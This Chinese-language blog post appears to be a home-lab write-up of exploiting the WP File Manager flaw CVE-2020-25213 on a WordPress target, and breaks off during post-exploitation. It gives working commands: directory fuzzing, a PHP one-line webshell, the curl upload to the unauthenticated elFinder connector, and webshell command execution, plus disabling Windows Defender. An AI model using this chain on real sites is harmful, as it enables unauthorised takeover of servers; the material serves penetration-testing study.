<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 8.1.2">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Mist","darkmode":false,"version":"8.27.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="0x00 前言在常规的自动化渗透测试中，安全工具高度依赖目标系统的默认特征库。然而在真实的攻防场景下，防御方常通过改变默认配置（如重命名高危目录）来实施特征隐藏（Security through Obscurity），从而规避扫描。 本次实战记录了一次针对 Windows 11 平台上 WordPress 靶机的黑盒测试过程。本文详细复盘了在常规扫描器漏报的情况下，如何通过调整 Fuzzing 策">
<meta property="og:type" content="article">
<meta property="og:title" content="黑盒测试复盘：突破隐蔽目录的 WP File Manager 漏洞利用全过程">
<meta property="og:url" content="http://example.com/2026/05/10/%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95%E5%A4%8D%E7%9B%98%EF%BC%9A%E7%AA%81%E7%A0%B4%E9%9A%90%E8%94%BD%E7%9B%AE%E5%BD%95%E7%9A%84-WP-File-Manager-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%85%A8%E8%BF%87%E7%A8%8B/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="0x00 前言在常规的自动化渗透测试中，安全工具高度依赖目标系统的默认特征库。然而在真实的攻防场景下，防御方常通过改变默认配置（如重命名高危目录）来实施特征隐藏（Security through Obscurity），从而规避扫描。 本次实战记录了一次针对 Windows 11 平台上 WordPress 靶机的黑盒测试过程。本文详细复盘了在常规扫描器漏报的情况下，如何通过调整 Fuzzing 策">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/blog1/1.png">
<meta property="og:image" content="http://example.com/images/blog1/2.png">
<meta property="og:image" content="http://example.com/images/blog1/3.png">
<meta property="og:image" content="http://example.com/images/blog1/4.png">
<meta property="og:image" content="http://example.com/images/blog1/5.png">
<meta property="og:image" content="http://example.com/images/blog1/6.png">
<meta property="og:image" content="http://example.com/images/blog1/7.png">
<meta property="og:image" content="http://example.com/images/blog1/8.png">
<meta property="og:image" content="http://example.com/images/blog1/11.png">
<meta property="og:image" content="http://example.com/images/blog1/9.png">
<meta property="og:image" content="http://example.com/images/blog1/10.png">
<meta property="article:published_time" content="2026-05-10T02:00:00.000Z">
<meta property="article:modified_time" content="2026-05-22T06:04:20.987Z">
<meta property="article:author" content="smile cat">
<meta property="article:tag" content="RCE漏洞">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="漏洞复现">
<meta property="article:tag" content="目录爆破">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/blog1/1.png">


<link rel="canonical" href="http://example.com/2026/05/10/%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95%E5%A4%8D%E7%9B%98%EF%BC%9A%E7%AA%81%E7%A0%B4%E9%9A%90%E8%94%BD%E7%9B%AE%E5%BD%95%E7%9A%84-WP-File-Manager-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%85%A8%E8%BF%87%E7%A8%8B/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2026/05/10/%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95%E5%A4%8D%E7%9B%98%EF%BC%9A%E7%AA%81%E7%A0%B4%E9%9A%90%E8%94%BD%E7%9B%AE%E5%BD%95%E7%9A%84-WP-File-Manager-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%85%A8%E8%BF%87%E7%A8%8B/","path":"2026/05/10/黑盒测试复盘：突破隐蔽目录的-WP-File-Manager-漏洞利用全过程/","title":"黑盒测试复盘：突破隐蔽目录的 WP File Manager 漏洞利用全过程"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>黑盒测试复盘：突破隐蔽目录的 WP File Manager 漏洞利用全过程 | Hexo</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Hexo</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E6%B5%8B%E8%AF%95%E7%8E%AF%E5%A2%83%E4%B8%8E%E6%8B%93%E6%89%91%E6%9E%B6%E6%9E%84"><span class="nav-number">2.</span> <span class="nav-text">0x01 测试环境与拓扑架构</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E4%BE%A6%E5%AF%9F%E9%98%B6%E6%AE%B5%EF%BC%9A%E4%BB%8E%E6%89%AB%E6%8F%8F%E5%99%A8%E6%BC%8F%E6%8A%A5%E5%88%B0%E7%9B%AE%E5%BD%95-Fuzzing"><span class="nav-number">3.</span> <span class="nav-text">0x02 侦察阶段：从扫描器漏报到目录 Fuzzing</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%89%AB%E5%B7%A5%E5%85%B7%E7%9A%84%E7%9B%B2%E5%8C%BA"><span class="nav-number">3.1.</span> <span class="nav-text">1. 常规漏扫工具的盲区</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%BC%95%E5%85%A5%E7%9B%AE%E5%BD%95%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95-Fuzzing"><span class="nav-number">3.2.</span> <span class="nav-text">2. 引入目录模糊测试 (Fuzzing)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-Fuzzing-%E7%AD%96%E7%95%A5%E4%BC%98%E5%8C%96%EF%BC%9A%E5%AE%9A%E5%90%91%E5%AD%97%E5%85%B8%E7%8B%99%E5%87%BB"><span class="nav-number">3.3.</span> <span class="nav-text">3. Fuzzing 策略优化：定向字典狙击</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%EF%BC%9A%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB%E4%B8%8E%E7%B3%BB%E7%BB%9F%E6%8E%A5%E7%AE%A1"><span class="nav-number">4.</span> <span class="nav-text">0x03 漏洞利用：指纹识别与系统接管</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E7%BB%84%E4%BB%B6%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB-Fingerprinting"><span class="nav-number">4.1.</span> <span class="nav-text">1. 组件指纹识别 (Fingerprinting)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E6%BC%8F%E6%B4%9E%E5%AE%9A%E7%BA%A7%E4%B8%8E%E8%BD%BD%E8%8D%B7%E9%94%BB%E9%80%A0-Payload-Crafting"><span class="nav-number">4.2.</span> <span class="nav-text">2. 漏洞定级与载荷锻造 (Payload Crafting)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E5%9F%BA%E4%BA%8E-elFinder-API-%E7%9A%84%E5%90%8E%E9%97%A8%E6%8A%95%E9%80%92"><span class="nav-number">4.3.</span> <span class="nav-text">3. 基于 elFinder API 的后门投递</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-%E9%98%B2%E5%BE%A1%E5%AF%B9%E6%8A%97%EF%BC%9A%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AD%96%E7%95%A5%E5%B8%A6%E6%9D%A5%E7%9A%84%E6%8C%91%E6%88%98"><span class="nav-number">5.</span> <span class="nav-text">0x04 防御对抗：终端安全策略带来的挑战</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-RCE-%E8%A7%A6%E5%8F%91%E4%B8%8E%E5%90%8E%E6%B8%97%E9%80%8F%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">6.</span> <span class="nav-text">0x05 RCE 触发与后渗透信息收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-%E6%80%BB%E7%BB%93%E4%B8%8E%E9%98%B2%E5%BE%A1%E5%BB%BA%E8%AE%AE"><span class="nav-number">7.</span> <span class="nav-text">0x05 总结与防御建议</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">smile cat</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">2</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2026/05/10/%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95%E5%A4%8D%E7%9B%98%EF%BC%9A%E7%AA%81%E7%A0%B4%E9%9A%90%E8%94%BD%E7%9B%AE%E5%BD%95%E7%9A%84-WP-File-Manager-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%85%A8%E8%BF%87%E7%A8%8B/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="smile cat">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="黑盒测试复盘：突破隐蔽目录的 WP File Manager 漏洞利用全过程 | Hexo">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          黑盒测试复盘：突破隐蔽目录的 WP File Manager 漏洞利用全过程
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2026-05-10 10:00:00" itemprop="dateCreated datePublished" datetime="2026-05-10T10:00:00+08:00">2026-05-10</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2026-05-22 14:04:20" itemprop="dateModified" datetime="2026-05-22T14:04:20+08:00">2026-05-22</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E5%AE%9E%E6%88%98%E9%9D%B6%E5%9C%BA%E5%A4%8D%E7%9B%98/" itemprop="url" rel="index"><span itemprop="name">实战靶场复盘</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>在常规的自动化渗透测试中，安全工具高度依赖目标系统的默认特征库。然而在真实的攻防场景下，防御方常通过改变默认配置（如重命名高危目录）来实施特征隐藏（Security through Obscurity），从而规避扫描。</p>
<p>本次实战记录了一次针对 Windows 11 平台上 WordPress 靶机的黑盒测试过程。本文详细复盘了在常规扫描器漏报的情况下，如何通过调整 Fuzzing 策略发现隐蔽目录，利用元数据进行指纹识别，并最终手工构造 Multipart 表单数据包触发 WP File Manager (CVE-2020-25213) RCE 漏洞的全过程。</p>
<hr>
<h2 id="0x01-测试环境与拓扑架构"><a href="#0x01-测试环境与拓扑架构" class="headerlink" title="0x01 测试环境与拓扑架构"></a>0x01 测试环境与拓扑架构</h2><p>为了最大程度还原真实内网环境的跨平台攻防交互，本次测试采用完全本地化的物理机与虚拟机结合架构：</p>
<ul>
<li><strong>攻击机 (Attacker)</strong>：Kali Linux (IP: 10.236.86.169)<ul>
<li><em>环境构建细节</em>：未使用预装版镜像，而是采用 Debian Base ISO 进行原生编译安装。此举彻底解决了在 VMware 平台下运行渗透测试工具时偶发的鼠标指针漂移与底层显卡驱动冲突问题。同时，考虑到后期 Fuzzing 字典与抓包数据的存储需求，手动划分了 80GB 的 LVM 虚拟磁盘空间。</li>
</ul>
</li>
<li><strong>靶机 (Victim)</strong>：Windows 11 (IP: 192.168.31.213)<ul>
<li><em>基础架构</em>：采用 phpStudy 构建 Web 运行环境（Apache + MySQL + PHP）。</li>
<li><em>应用框架</em>：部署原生 WordPress CMS 系统。</li>
<li><em>防御假设设定</em>：为模拟真实的运维防御动作，靶机上安装了存在已知漏洞的插件，但管理员手动修改了该插件在 <code>/wp-content/plugins/</code> 下的默认目录名称，以此来测试自动化工具的检出能力。</li>
</ul>
</li>
<li><strong>网络拓扑</strong>：攻防双方均处于 <code>192.168.31.0/24</code> 及 <code>10.236.86.0/24</code> 路由可达的局域网环境中。</li>
</ul>
<hr>
<h2 id="0x02-侦察阶段：从扫描器漏报到目录-Fuzzing"><a href="#0x02-侦察阶段：从扫描器漏报到目录-Fuzzing" class="headerlink" title="0x02 侦察阶段：从扫描器漏报到目录 Fuzzing"></a>0x02 侦察阶段：从扫描器漏报到目录 Fuzzing</h2><p>在渗透的初始阶段，我对目标靶机进行了被动与主动的信息收集。</p>
<h3 id="1-常规漏扫工具的盲区"><a href="#1-常规漏扫工具的盲区" class="headerlink" title="1. 常规漏扫工具的盲区"></a>1. 常规漏扫工具的盲区</h3><p>针对 WordPress 架构，业界通常首选 WPScan 进行被动枚举。但在本次针对性扫描中，工具并未检出任何高危插件：</p>
<p><img src="/images/blog1/1.png" alt="WPScan 扫描结果漏报"></p>
<p><strong>技术分析</strong>：WPScan 的插件枚举逻辑主要依赖于发送 HTTP 请求探测 <code>/wp-content/plugins/[插件原生名称]/</code> 路径。一旦防御者重命名了该目录（即改变了 Plugin Slug），基于静态规则库的传统扫描器便会完全失效。</p>
<h3 id="2-引入目录模糊测试-Fuzzing"><a href="#2-引入目录模糊测试-Fuzzing" class="headerlink" title="2. 引入目录模糊测试 (Fuzzing)"></a>2. 引入目录模糊测试 (Fuzzing)</h3><p>确认静态扫描失效后，我转而使用 <code>dirsearch</code> 对插件目录进行路径模糊测试，试图通过暴力枚举找出被隐藏的业务文件夹。</p>
<p>为了提高探测精度并规避基础的 WAF 拦截，我配置了以下探测参数：</p>
<ul>
<li><code>-e php,txt,zip,bak</code>：重点探测后端脚本、文本说明及备份压缩文件。</li>
<li><code>-f</code>：强制对所有目录进行探测（Force extensions）。</li>
<li><code>--random-agent</code>：每次请求使用随机 User-Agent 头。</li>
</ul>
<p>执行命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirsearch -u http://192.168.31.213/wordpress/wp-content/plugins/ -e php,txt,zip,bak -f --random-agent</span><br></pre></td></tr></table></figure>

<p><img src="/images/blog1/2.png" alt="Dirsearch 默认字典配置"></p>
<p>然而，第一轮基于默认字典（包含 23635 个常用目录名）的扫描并未达到预期效果。终端输出了大量 <code>403 Forbidden</code> 以及 <code>301 Moved Permanently</code> 状态码：</p>
<p><img src="/images/blog1/3.png" alt="Dirsearch 扫描日志降噪分析"></p>
<p><strong>深度研判：如何排除假阳性（False Positives）干扰？</strong><br>面对满屏红色的 403 和 301 状态码，如果不加甄别极易陷入“假阳性”陷阱。为确认第一轮扫描是否真正无果，我通过以下两个底层维度对海量日志进行了严格的降噪排查：</p>
<ol>
<li><p><strong>基于触发特征的 403 拦截甄别</strong>：<br>日志中大量出现的 403 报错（如针对 <code>%C0%AE%C0%AE%C0%AF</code> 等 URL 编码变体的探测），并非意味着存在此类奇葩目录。这是因为扫描器的 Payload 携带了明显的“目录穿越（Directory Traversal）”恶意特征，在抵达业务层前，直接触发了目标服务器底层的安全规则（WAF&#x2F;Apache 防护）而被强制阻断。这些响应纯属“规则拦截噪音”。</p>
</li>
<li><p><strong>基于响应包体积（Content-Length）与手工介入的 301 甄别</strong>：<br>扫描器虽捕获了大量 301 重定向（如 <code>/admin/</code>、<code>/phpmyadmin/</code>），但横向对比发现，这些响应数据包的体积高度一致。经手工介入跟进请求（Manual Verification）证实，这些路径最终均被 WordPress 底层的“目录规范化重定向（Canonical Redirect）”统一抛转至了默认的 404 报错主页（即 Soft 404 现象）。</p>
</li>
</ol>
<p><strong>阶段性研判结论</strong>：<br>第一轮扫描产生的所有异常状态码，均被证实为底层路由分发与安全策略阻断所引发的“环境噪音”，未发现任何指向真实有效资产的突破口。这反向印证了目标系统采用了极度偏门的目录命名规则，完美逃逸了常规 2W+ 级别字典的火力覆盖范围。战术必须立刻升级。</p>
<h3 id="3-Fuzzing-策略优化：定向字典狙击"><a href="#3-Fuzzing-策略优化：定向字典狙击" class="headerlink" title="3. Fuzzing 策略优化：定向字典狙击"></a>3. Fuzzing 策略优化：定向字典狙击</h3><p>实战证明，自动化工具的效能受限于其底层字典库。为突破此瓶颈，我模拟了高级红队中常用的千万级数据字典（如 SecLists），生成了一份包含高频敏感词及特定变种的定制化字典 <code>raft-large-directories.txt</code>。</p>
<p>通过挂载定制字典重新发起请求：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirsearch -u http://192.168.31.213/wordpress/wp-content/plugins/ -e php,txt,zip,bak -f --random-agent -w raft-large-directories.txt</span><br></pre></td></tr></table></figure>

<p><img src="/images/blog1/4.png" alt="挂载定制字典进行探测"></p>
<p>在高质量字典的碰撞下，服务器防线出现破局点。扫描日志中成功捕获到了针对非标准目录 <code>/bomb/</code> 的异常状态码：</p>
<p><img src="/images/blog1/5.png" alt="成功锁定隐蔽目录 bomb"></p>
<p>至此，通过 Fuzzing 策略的调整，我成功从黑盒状态下锁定了被管理员隐蔽重命名的高危组件目录位置，外围防线已被撕裂。</p>
<hr>
<h2 id="0x03-漏洞利用：指纹识别与系统接管"><a href="#0x03-漏洞利用：指纹识别与系统接管" class="headerlink" title="0x03 漏洞利用：指纹识别与系统接管"></a>0x03 漏洞利用：指纹识别与系统接管</h2><p>锁定了 <code>/bomb/</code> 目录后，接下来的核心任务是确认该隐蔽组件的真实身份，并寻找可利用的攻击面。</p>
<h3 id="1-组件指纹识别-Fingerprinting"><a href="#1-组件指纹识别-Fingerprinting" class="headerlink" title="1. 组件指纹识别 (Fingerprinting)"></a>1. 组件指纹识别 (Fingerprinting)</h3><p>在纯黑盒环境下，直接对未知目录发起攻击是不明智的。依据 WordPress 插件开发的目录树规范，绝大多数合规插件会在其根目录下保留 <code>readme.txt</code> 或 <code>changelog.txt</code> 等元数据文件。</p>
<p>我利用 <code>curl</code> 构造了轻量级的 HTTP GET 探针，尝试读取该目录下的说明文件，以期获取组件的版本指纹：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -s http://192.168.31.213/wordpress/wp-content/plugins/bomb/readme.txt | <span class="built_in">head</span> -n 10</span><br></pre></td></tr></table></figure>

<p><img src="/images/blog1/6.png" alt="组件指纹识别：通过 readme.txt 提取元数据"></p>
<p><strong>情报确认</strong>：探针成功返回了数据。通过提取头部元数据（Metadata），我确认了这个被管理员重命名为 <code>bomb</code> 的隐蔽目录，其真实身份是 <strong>WP File Manager</strong> 插件，且当前运行版本为 <strong>6.0</strong>。<br>结合开源威胁情报（OSINT）及 CVE 漏洞库检索，确认该版本存在极其严重且易被利用的远程代码执行漏洞（CVE-2020-25213）。</p>
<h3 id="2-漏洞定级与载荷锻造-Payload-Crafting"><a href="#2-漏洞定级与载荷锻造-Payload-Crafting" class="headerlink" title="2. 漏洞定级与载荷锻造 (Payload Crafting)"></a>2. 漏洞定级与载荷锻造 (Payload Crafting)</h3><p>CVE-2020-25213 的成因在于，WP File Manager 底层依赖了开源的 <code>elFinder</code> 文件管理器组件。开发者在发布正式版时，严重疏忽地将一个用于本地测试的无鉴权接口文件（<code>connector.minimal.php.dist</code>）去除了 <code>.dist</code> 后缀。这导致任何人都可以通过该接口直接调用底层的 C 端文件操作 API。</p>
<p>在明确了攻击链路后，我选择在本地手工锻造一个极简的 PHP 一句话木马（WebShell），而非依赖 MSF 等重量级框架，以保障载荷的纯净度与隐蔽性：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;&#x27;</span> &gt; payload.php</span><br><span class="line"><span class="built_in">cat</span> payload.php</span><br></pre></td></tr></table></figure>

<p><img src="/images/blog1/7.png" alt="本地构造极简 PHP 一句话木马"></p>
<p>此 Payload 将利用 PHP 底层的 <code>system()</code> 函数，直接向目标宿主机的操作系统下发指令，并通过 HTTP GET 方法的 <code>cmd</code> 参数进行动态接收。</p>
<h3 id="3-基于-elFinder-API-的后门投递"><a href="#3-基于-elFinder-API-的后门投递" class="headerlink" title="3. 基于 elFinder API 的后门投递"></a>3. 基于 elFinder API 的后门投递</h3><p>漏洞利用阶段，我规避了常规的图形化上传，直接使用 <code>curl</code> 模拟浏览器底层行为，向存在缺陷的 <code>connector.minimal.php</code> 接口发送 Multipart 表单数据包。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -F <span class="string">&quot;cmd=upload&quot;</span> -F <span class="string">&quot;target=l1_Lw&quot;</span> -F <span class="string">&quot;upload[]=@payload.php&quot;</span> http://192.168.31.213/wordpress/wp-content/plugins/bomb/lib/php/connector.minimal.php</span><br></pre></td></tr></table></figure>

<p><img src="/images/blog1/8.png" alt="构造 Multipart 数据包完成木马投递"></p>
<p><strong>数据包构造的底层硬核解析</strong>：</p>
<ul>
<li><strong><code>cmd=upload</code> &amp; <code>target=l1_Lw</code></strong>：这是 <code>elFinder</code> 底层 API 的特定语法。<code>l1_Lw</code> 是插件工作根目录经过 Base64 变种编码后的标识符。该指令强制底层引擎将文件写入指定的高权限目录。</li>
<li><strong><code>upload[]=@payload.php</code>（致命细节）</strong>：此处必须在参数名后附加 <code>[]</code>。因为目标服务器的 PHP 引擎及 elFinder 核心代码在处理批量文件上传时，严格要求数据类型为<strong>数组（Array）</strong>。如果不加 <code>[]</code> 触发数组强制转换，PHP 引擎将抛出类型不匹配异常，导致 Payload 无法落地。</li>
</ul>
<p>如截图所示，服务器返回了详细的 JSON 响应。其中的 <code>&quot;name&quot;:&quot;payload.php&quot;</code> 及暴露的物理路径证明，WebShell 已成功突破防线，硬着陆于目标磁盘。</p>
<hr>
<h2 id="0x04-防御对抗：终端安全策略带来的挑战"><a href="#0x04-防御对抗：终端安全策略带来的挑战" class="headerlink" title="0x04 防御对抗：终端安全策略带来的挑战"></a>0x04 防御对抗：终端安全策略带来的挑战</h2><p>在尝试通过 <code>curl</code> 投递 Payload 的第一回合，攻击链路意外中断。尽管 Web 层的响应显示上传逻辑已触发，但目标宿主机的端点防护系统（Windows Defender）瞬间发出了红色预警：</p>
<p><img src="/images/blog1/11.png" alt="Windows Defender 实时拦截截图"></p>
<p><strong>深度防御行为分析：</strong><br>通过对拦截日志（图 11）的复盘，可以提取出两个关键的攻防情报：</p>
<ol>
<li><strong>静态特征码识别</strong>：Defender 将本次投递的载荷精准识别为 <code>Backdoor:PHP/Perhetshell.A!dha</code>。这证明即使是极简的 <code>system()</code> 函数调用，在现代 AV 引擎的静态特征库中也属于“高度敏感”级别的黑名单。</li>
<li><strong>落地即秒杀（Kill on Landing）</strong>：注意受影响的项目路径为 <code>C:\Windows\php2EAC.tmp</code>。这揭示了 PHP 处理文件上传的底层逻辑——在文件被移动到 Web 根目录之前，PHP 会先在系统临时文件夹（如 <code>C:\Windows\Temp</code>）生成临时缓冲区文件。Defender 的实时防护（Real-time Protection）正是利用文件系统钩子（File System Hook）在 <code>.tmp</code> 文件落地的瞬间完成了扫描与清除。</li>
</ol>
<p><strong>战术调整（变量控制）</strong>：<br>在真实的红蓝对抗中，此时需引入**免杀（AV Evasion）**技术，如混淆编码或加密内存执行。但由于本次实验的核心目标是验证 <strong>WP File Manager 插件层面的逻辑漏洞</strong>，为了排除宿主机端点防御对 Web 漏洞触发路径的干扰，我采取了“变量控制”策略：在实验环境内手动挂起 Windows Defender 的实时监控。</p>
<hr>
<h2 id="0x05-RCE-触发与后渗透信息收集"><a href="#0x05-RCE-触发与后渗透信息收集" class="headerlink" title="0x05 RCE 触发与后渗透信息收集"></a>0x05 RCE 触发与后渗透信息收集</h2><p>木马落地后，Web 应用的边界已被彻底击穿。为了验证操作系统级别的控制权，并为可能的内网横向移动（Lateral Movement）收集情报，我向预置的木马接口发送了 <code>ipconfig</code> 指令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl <span class="string">&quot;http://192.168.31.213/wordpress/wp-content/plugins/bomb/lib/files/payload.php?cmd=ipconfig&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/blog1/9.png" alt="触发 RCE 执行 ipconfig (暴露系统跨平台字符集碰撞)"></p>
<p>执行后，终端成功捕获了目标 Windows 宿主机的网络拓扑信息。但此时出现了一个典型的<strong>跨平台字符编码碰撞</strong>现象：目标机为中文 Windows，底层 CMD 输出采用 <strong>GBK (CP936)</strong> 编码，而攻击机 Kali 终端默认采用 <strong>UTF-8</strong> 解析，导致中文字段呈现乱码。</p>
<p>为了保障渗透战报的规范性与可读性，我利用 Linux 原生的管道符结合 <code>iconv</code> 工具，在数据流回显的瞬间进行了底层的强制转码解码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -s <span class="string">&quot;http://192.168.31.213/wordpress/wp-content/plugins/bomb/lib/files/payload.php?cmd=ipconfig&quot;</span> | iconv -f GBK -t UTF-8</span><br></pre></td></tr></table></figure>

